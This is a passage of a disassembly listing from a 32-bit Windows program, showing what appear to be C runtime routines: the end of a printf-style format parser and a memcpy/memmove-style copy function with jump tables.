or [ebp+1F8h+var_210], 10h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CA5: ; CODE XREF: sub_4069D7+294�j
or [ebp+1F8h+var_210], 20h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CAE: ; CODE XREF: sub_4069D7+28F�j
mov al, [ebx]
cmp al, 36h
jnz short loc_406CCB
cmp byte ptr [ebx+1], 34h
jnz short loc_406CCB
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CCB: ; CODE XREF: sub_4069D7+2DB�j
; sub_4069D7+2E1�j
cmp al, 33h
jnz short loc_406CE6
cmp byte ptr [ebx+1], 32h
jnz short loc_406CE6
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CE6: ; CODE XREF: sub_4069D7+2F6�j
; sub_4069D7+2FC�j
cmp al, 64h
jz loc_4072F4 ; default
cmp al, 69h
jz loc_4072F4 ; default
cmp al, 6Fh
jz loc_4072F4 ; default
cmp al, 75h
jz loc_4072F4 ; default
cmp al, 78h
jz loc_4072F4 ; default
cmp al, 58h
jz loc_4072F4 ; default
mov [ebp+1F8h+var_26C], esi
loc_406D19: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406B79 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40CA00
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_406D4B
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_40730D
loc_406D4B: ; CODE XREF: sub_4069D7+359�j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406D5B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 7
cmp eax, 64h
jg loc_406ED9
jz loc_406F58
cmp eax, 53h
jg loc_406E21
jz short loc_406DD2
sub eax, 41h
jz short loc_406D8D
dec eax
dec eax
jz short loc_406DC1
dec eax
dec eax
jz short loc_406D8D
dec eax
dec eax
jnz loc_4071DC
loc_406D8D: ; CODE XREF: sub_4069D7+3A4�j
; sub_4069D7+3AC�j
add dl, 20h
mov [ebp+1F8h+var_270], 1
mov [ebp+1F8h+var_211], dl
loc_406D9A: ; CODE XREF: sub_4069D7+459�j
; sub_4069D7+51D�j
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_406F7C
mov [ebp+1F8h+var_218], 6
jmp loc_406FCA
; ---------------------------------------------------------------------------
loc_406DC1: ; CODE XREF: sub_4069D7+3A8�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406E3E
or [ebp+1F8h+var_210], 800h
jmp short loc_406E3E
; ---------------------------------------------------------------------------
loc_406DD2: ; CODE XREF: sub_4069D7+39F�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406DE1
or [ebp+1F8h+var_210], 800h
loc_406DE1: ; CODE XREF: sub_4069D7+401�j
; sub_4069D7+694�j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_406DEE
mov ecx, 7FFFFFFFh
loc_406DEE: ; CODE XREF: sub_4069D7+410�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_4071BA
cmp edi, esi
jnz short loc_406E12
mov eax, off_423928
mov [ebp+1F8h+var_21C], eax
loc_406E12: ; CODE XREF: sub_4069D7+431�j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_4071AF
; ---------------------------------------------------------------------------
loc_406E21: ; CODE XREF: sub_4069D7+399�j
sub eax, 58h
jz loc_407063
dec eax
dec eax
jz short loc_406E8B
sub eax, ecx
jz loc_406D9A
dec eax
dec eax
jnz loc_4071DC
loc_406E3E: ; CODE XREF: sub_4069D7+3F0�j
; sub_4069D7+3F9�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_406E73
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40D732
add esp, 10h
test eax, eax
jz short loc_406E80
mov [ebp+1F8h+var_248], 1
jmp short loc_406E80
; ---------------------------------------------------------------------------
loc_406E73: ; CODE XREF: sub_4069D7+473�j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_406E80: ; CODE XREF: sub_4069D7+491�j
; sub_4069D7+49A�j
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_4071DC
; ---------------------------------------------------------------------------
loc_406E8B: ; CODE XREF: sub_4069D7+455�j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_406EC5
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_406EC5
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_406EBD
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EBD: ; CODE XREF: sub_4069D7+4D3�j
mov [ebp+1F8h+var_23C], esi
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EC5: ; CODE XREF: sub_4069D7+4BE�j
; sub_4069D7+4C5�j
mov eax, off_423924
mov [ebp+1F8h+var_21C], eax
push eax
loc_406ECE: ; CODE XREF: sub_4069D7+680�j
call sub_404130
pop ecx
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406ED9: ; CODE XREF: sub_4069D7+38A�j
cmp eax, 70h
jg loc_407068
jz loc_40705C
cmp eax, 65h
jl loc_4071DC
cmp eax, 67h
jle loc_406D9A
cmp eax, 69h
jz short loc_406F58
cmp eax, 6Eh
jz short loc_406F23
cmp eax, 6Fh
jnz loc_4071DC
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_406F63
or [ebp+1F8h+var_210], 200h
jmp short loc_406F63
; ---------------------------------------------------------------------------
loc_406F23: ; CODE XREF: sub_4069D7+52B�j
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40D5BD
test eax, eax
jz loc_40730D
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_406F47
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_406F4C
; ---------------------------------------------------------------------------
loc_406F47: ; CODE XREF: sub_4069D7+565�j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_406F4C: ; CODE XREF: sub_4069D7+56E�j
mov [ebp+1F8h+var_248], 1
jmp loc_4072E1
; ---------------------------------------------------------------------------
loc_406F58: ; CODE XREF: sub_4069D7+390�j
; sub_4069D7+526�j
or [ebp+1F8h+var_210], 40h
loc_406F5C: ; CODE XREF: sub_4069D7+69C�j
mov [ebp+1F8h+var_220], 0Ah
loc_406F63: ; CODE XREF: sub_4069D7+541�j
; sub_4069D7+54A�j ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_4070B2
loc_406F6F: ; CODE XREF: sub_4069D7+6E0�j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_4070E7
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_4069D7+3D8�j
jnz short loc_406F8C
cmp dl, 67h
jnz short loc_406FCA
mov [ebp+1F8h+var_218], 1
jmp short loc_406FCA
; ---------------------------------------------------------------------------
loc_406F8C: ; CODE XREF: sub_4069D7:loc_406F7C�j
cmp [ebp+1F8h+var_218], eax
jle short loc_406F94
mov [ebp+1F8h+var_218], eax
loc_406F94: ; CODE XREF: sub_4069D7+5B8�j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_406FCA
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_40773A
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_406FC1
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_406FC8
; ---------------------------------------------------------------------------
loc_406FC1: ; CODE XREF: sub_4069D7+5DE�j
mov [ebp+1F8h+var_218], 0A3h
loc_406FC8: ; CODE XREF: sub_4069D7+5E8�j
xor esi, esi
loc_406FCA: ; CODE XREF: sub_4069D7+3E5�j
; sub_4069D7+5AA�j ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push off_423F98
call sub_405193
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_407027
cmp [ebp+1F8h+var_218], esi
jnz short loc_407027
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_423FA4
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407027: ; CODE XREF: sub_4069D7+634�j
; sub_4069D7+639�j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_407046
cmp edi, esi
jnz short loc_407046
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_423FA0
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407046: ; CODE XREF: sub_4069D7+654�j
; sub_4069D7+658�j
cmp byte ptr [ebx], 2Dh
jnz short loc_407056
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407056: ; CODE XREF: sub_4069D7+672�j
push ebx
jmp loc_406ECE
; ---------------------------------------------------------------------------
loc_40705C: ; CODE XREF: sub_4069D7+50B�j
mov [ebp+1F8h+var_218], 8
loc_407063: ; CODE XREF: sub_4069D7+44D�j
mov [ebp+1F8h+var_244], ecx
jmp short loc_407089
; ---------------------------------------------------------------------------
loc_407068: ; CODE XREF: sub_4069D7+505�j
sub eax, 73h
jz loc_406DE1
dec eax
dec eax
jz loc_406F5C
sub eax, 3
jnz loc_4071DC
mov [ebp+1F8h+var_244], 27h
loc_407089: ; CODE XREF: sub_4069D7+68F�j
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_406F63
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_406F63
; ---------------------------------------------------------------------------
loc_4070B2: ; CODE XREF: sub_4069D7+592�j
test cx, 1000h
jnz loc_406F6F
add edi, 4
test cl, 20h
jz short loc_4070DA
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_4070D3
movsx eax, word ptr [edi-4]
jmp short loc_4070D7
; ---------------------------------------------------------------------------
loc_4070D3: ; CODE XREF: sub_4069D7+6F4�j
movzx eax, word ptr [edi-4]
loc_4070D7: ; CODE XREF: sub_4069D7+6FA�j
cdq
jmp short loc_4070EA
; ---------------------------------------------------------------------------
loc_4070DA: ; CODE XREF: sub_4069D7+6EC�j
test cl, 40h
mov eax, [edi-4]
jz short loc_4070E5
cdq
jmp short loc_4070E7
; ---------------------------------------------------------------------------
loc_4070E5: ; CODE XREF: sub_4069D7+709�j
xor edx, edx
loc_4070E7: ; CODE XREF: sub_4069D7+5A0�j
; sub_4069D7+70C�j
mov [ebp+1F8h+var_224], edi
loc_4070EA: ; CODE XREF: sub_4069D7+701�j
test cl, 40h
jz short loc_407107
cmp edx, esi
jg short loc_407107
jl short loc_4070F9
cmp eax, esi
jnb short loc_407107
loc_4070F9: ; CODE XREF: sub_4069D7+71C�j
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_407107: ; CODE XREF: sub_4069D7+716�j
; sub_4069D7+71A�j ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_407115
xor ebx, ebx
loc_407115: ; CODE XREF: sub_4069D7+73A�j
cmp [ebp+1F8h+var_218], 0
jge short loc_407124
mov [ebp+1F8h+var_218], 1
jmp short loc_407135
; ---------------------------------------------------------------------------
loc_407124: ; CODE XREF: sub_4069D7+742�j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_407135
mov [ebp+1F8h+var_218], eax
loc_407135: ; CODE XREF: sub_4069D7+74B�j
; sub_4069D7+759�j
mov eax, edi
or eax, ebx
jnz short loc_40713F
and [ebp+1F8h+var_234], 0
loc_40713F: ; CODE XREF: sub_4069D7+762�j
lea esi, [ebp+1F8h+var_D]
loc_407145: ; CODE XREF: sub_4069D7+7A0�j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407155
mov eax, edi
or eax, ebx
jz short loc_407179
loc_407155: ; CODE XREF: sub_4069D7+776�j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40D750
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407174
add ecx, [ebp+1F8h+var_244]
loc_407174: ; CODE XREF: sub_4069D7+798�j
mov [esi], cl
dec esi
jmp short loc_407145
; ---------------------------------------------------------------------------
loc_407179: ; CODE XREF: sub_4069D7+77C�j
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_4071DC
test eax, eax
jz short loc_40719B
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_4071DC
loc_40719B: ; CODE XREF: sub_4069D7+7BB�j
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071A7: ; CODE XREF: sub_4069D7+7DA�j
dec ecx
cmp [eax], si
jz short loc_4071B3
inc eax
inc eax
loc_4071AF: ; CODE XREF: sub_4069D7+445�j
cmp ecx, esi
jnz short loc_4071A7
loc_4071B3: ; CODE XREF: sub_4069D7+7D4�j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071BA: ; CODE XREF: sub_4069D7+429�j
cmp edi, esi
jnz short loc_4071C6
mov eax, off_423924
mov [ebp+1F8h+var_21C], eax
loc_4071C6: ; CODE XREF: sub_4069D7+7E5�j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_4071D2
; ---------------------------------------------------------------------------
loc_4071CB: ; CODE XREF: sub_4069D7+7FD�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4071D6
inc eax
loc_4071D2: ; CODE XREF: sub_4069D7+7F2�j
cmp ecx, esi
jnz short loc_4071CB
loc_4071D6: ; CODE XREF: sub_4069D7+7F8�j
sub eax, [ebp+1F8h+var_21C]
loc_4071D9: ; CODE XREF: sub_4069D7+4E1�j
; sub_4069D7+4E9�j ...
mov [ebp+1F8h+var_220], eax
loc_4071DC: ; CODE XREF: sub_4069D7+3B0�j
; sub_4069D7+461�j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_4072E1
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_407212
test ax, 100h
jz short loc_4071F9
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_4071F9: ; CODE XREF: sub_4069D7+81A�j
test al, 1
jz short loc_407203
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_407203: ; CODE XREF: sub_4069D7+824�j
test al, 2
jz short loc_407212
mov [ebp+1F8h+var_230], 20h
loc_40720B: ; CODE XREF: sub_4069D7+820�j
; sub_4069D7+82A�j
mov [ebp+1F8h+var_234], 1
loc_407212: ; CODE XREF: sub_4069D7+814�j
; sub_4069D7+82E�j
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_407232
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406969
add esp, 0Ch
loc_407232: ; CODE XREF: sub_4069D7+848�j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_40698D
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40725F
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40725F
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_40725F: ; CODE XREF: sub_4069D7+871�j
; sub_4069D7+877�j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_4072B9
test eax, eax
jle short loc_4072B9
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_407272: ; CODE XREF: sub_4069D7+8D8�j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40D732
add esp, 10h
test eax, eax
jnz short loc_4072B3
cmp [ebp+1F8h+var_268], eax
jz short loc_4072B3
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_40698D
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_407272
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B3: ; CODE XREF: sub_4069D7+8BB�j
; sub_4069D7+8C0�j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B9: ; CODE XREF: sub_4069D7+88F�j
; sub_4069D7+893�j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_40698D
pop ecx
loc_4072C6: ; CODE XREF: sub_4069D7+8DA�j
; sub_4069D7+8E0�j
cmp [ebp+1F8h+var_22C], 0
jl short loc_4072E1
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_4072E1
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_4072E1: ; CODE XREF: sub_4069D7+57C�j
; sub_4069D7+809�j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4072F4 ; default
push [ebp+1F8h+var_24C]
call sub_403603
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4072F4: ; CODE XREF: sub_4069D7+19C�j
; sub_4069D7+1BF�j ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_407324
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406B35
; ---------------------------------------------------------------------------
loc_40730D: ; CODE XREF: sub_4069D7+36E�j
; sub_4069D7+55B�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406A47
; ---------------------------------------------------------------------------
loc_407324: ; CODE XREF: sub_4069D7+158�j
; sub_4069D7+166�j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_407331
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407331: ; CODE XREF: sub_4069D7+951�j
mov eax, [ebp+1F8h+var_22C]
loc_407334: ; CODE XREF: sub_4069D7+88�j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1F8h
leave
retn
sub_4069D7 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_40734F dd offset loc_406D19 ; DATA XREF: sub_4069D7+1A2�r
dd offset loc_406B80 ; jump table for switch statement
dd offset loc_406B9B
dd offset loc_406BEA
dd offset loc_406C24
dd offset loc_406C2C
dd offset loc_406C63
dd offset loc_406D5B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407370 proc near ; CODE XREF: sub_402BA0+4D�p
; sub_405B50+2DA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407390
cmp edi, eax
jb loc_407534
loc_407390: ; CODE XREF: sub_407370+16�j
cmp ecx, 100h
jb short loc_4073B7
cmp dword_433C7C, 0
jz short loc_4073B7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_4073B7
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_407370+26�j
; sub_407370+2F�j ...
test edi, 3
jnz short loc_4073D4
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp ds:off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073D4: ; CODE XREF: sub_407370+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4073EC
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4073F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4073EC: ; CODE XREF: sub_407370+6E�j
jmp dword ptr ds:loc_4074F4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073F4: ; CODE XREF: sub_407370+58�j
; sub_407370+B6�j ...
jmp ds:off_407478[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407408
dd offset loc_407434
dd offset loc_407458
; ---------------------------------------------------------------------------
loc_407408: ; DATA XREF: sub_407370+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp ds:off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407434: ; DATA XREF: sub_407370+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp ds:off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407458: ; DATA XREF: sub_407370+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp ds:off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407478 dd offset loc_4074DB ; DATA XREF: sub_407370:loc_4073F4�r
dd offset loc_4074C8
dd offset loc_4074C0
dd offset loc_4074B8
dd offset loc_4074B0
dd offset loc_4074A8
dd offset loc_4074A0
dd offset loc_407498
; ---------------------------------------------------------------------------
loc_407498: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4074A0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4074A8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4074B0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4074B8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4074C0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4074C8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4074DB: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370:off_407478�o
jmp ds:off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4074E4 dd offset loc_4074F4 ; DATA XREF: sub_407370+5C�r
; sub_407370+BA�r ...
dd offset loc_4074FC
dd offset loc_407508
dd offset loc_40751C
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4074FC: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407508: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40751C: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407534: ; CODE XREF: sub_407370+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407568
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp ds:off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40755C: ; CODE XREF: sub_407370+1DD�j
; sub_407370+238�j ...
neg ecx
jmp ds:off_407630[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407568: ; CODE XREF: sub_407370+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407580
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_407580+4[eax*4]
; ---------------------------------------------------------------------------
loc_407580: ; CODE XREF: sub_407370+202�j
; DATA XREF: sub_407370+209�r
jmp ds:off_407680[ecx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
jnz short loc_4075CB
add [eax-1FFFBF8Bh], bh
jnz short near ptr loc_4075D1+2
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp ds:off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h
db 2, 83h, 0EEh
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_407370+219�j
add al, [ebx-67CFD11h]
loc_4075D1: ; CODE XREF: sub_407370+221�j
or [edx-78h], dh
std
rep movsd
cld
jmp ds:off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40755C
std
rep movsd
cld
jmp ds:off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407634
dd offset loc_40763C
dd offset loc_407644
dd offset loc_40764C
dd offset loc_407654
dd offset loc_40765C
dd offset loc_407664
off_407630 dd offset loc_407677 ; DATA XREF: sub_407370+1EE�r
; ---------------------------------------------------------------------------
loc_407634: ; DATA XREF: sub_407370+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40763C: ; DATA XREF: sub_407370+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407644: ; DATA XREF: sub_407370+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40764C: ; DATA XREF: sub_407370+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407654: ; DATA XREF: sub_407370+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40765C: ; DATA XREF: sub_407370+2B8�o
mov eax, [esi+ecx*4+8]
